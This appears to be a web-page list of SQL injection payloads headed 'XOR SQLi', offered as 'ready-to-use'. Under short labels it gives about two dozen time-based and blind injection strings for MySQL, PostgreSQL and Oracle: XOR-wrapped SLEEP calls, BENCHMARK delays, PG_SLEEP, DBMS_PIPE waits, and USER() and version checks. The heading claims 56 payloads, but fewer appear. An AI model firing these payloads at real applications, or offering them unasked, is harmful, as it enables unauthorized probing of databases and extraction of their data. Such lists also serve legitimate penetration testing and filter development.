XOR SQLi
56 ready-to-use payloads
XOR MySQL SLEEP 0
XOR-based MySQL SLEEP(10) with single quotes
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X
XOR MySQL SLEEP DQ
XOR-based SLEEP(10) with double quotes
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
MySQL SLEEP Subquery
MySQL SLEEP(5) via nested subquery
' AND (SELECT 8839 FROM (SELECT(SLEEP(5)))uzIY) AND 'mSUA'='mSUA
XOR MySQL Nested Now
XOR SLEEP(10) with nested now() select
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
XOR MySQL Comment Sleep
XOR SLEEP(5) with inline comment
X'XOR(if(now()=sysdate(),/**/sleep(5)/**/,0))XOR'X
XOR MySQL Nested Sleep
XOR SLEEP(5) with nested parens
X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X
XOR MySQL Benchmark
XOR BENCHMARK 1M MD5 hashes
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'XXOR MySQL Sleep 9
XOR SLEEP(9) via SELECT subquery
'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z
MySQL Sleep 6 Subquery
MySQL SLEEP(6) subquery
(SELECT(0)FROM(SELECT(SLEEP(6)))a)
XOR MySQL 5x5
XOR SLEEP(25) via multiplication
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
XOR MySQL 5x5x0
XOR SLEEP(0) via zero multiplication
'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
MySQL Sleep 9 Subquery
MySQL SLEEP(9) AND subquery
1 AND (SELECT(0)FROM(SELECT(SLEEP(9)))a)-- wXyW
MySQL Sleep 5 Select
MySQL SLEEP(5) via SELECT * FROM
(SELECT * FROM (SELECT(SLEEP(5)))a)
MySQL Sleep 5 Concat
MySQL SLEEP(5) with URL-encoded concat
'%2b(select*from(select(sleep(5)))a)%2b'
MySQL CASE SLEEP
MySQL CASE WHEN version length check
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
PostgreSQL PG_SLEEP
PostgreSQL PG_SLEEP(5) stacked
');(SELECT 4564 FROM PG_SLEEP(5))--
MySQL MID Check
MySQL MID/LIKE blind version check
[")//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
Oracle Pipe Receive
Oracle DBMS_PIPE 5s delay
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
Oracle Pipe AND
Oracle DBMS_PIPE AND condition
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
MySQL Sleep Subq AND
MySQL SLEEP(5) AND with padding
1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK
MySQL Sleep 20
MySQL SLEEP(20) compact
(select*from(select(sleep(20)))a)
MySQL Sleep 0
MySQL SLEEP(0) URL-encoded concat
'%2b(select*from(select(sleep(0)))a)%2b'
XOR Constant True
XOR SLEEP(10) with constant TRUE
*'XOR(if(2=2,sleep(10),0))OR'
MySQL USER() Blind
MySQL blind USER() length check
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
MySQL Sleep 20 Nested
MySQL SLEEP(20) with IF TRUE
'+(select*from(select(if(1=1,sleep(20),false)))a)+'"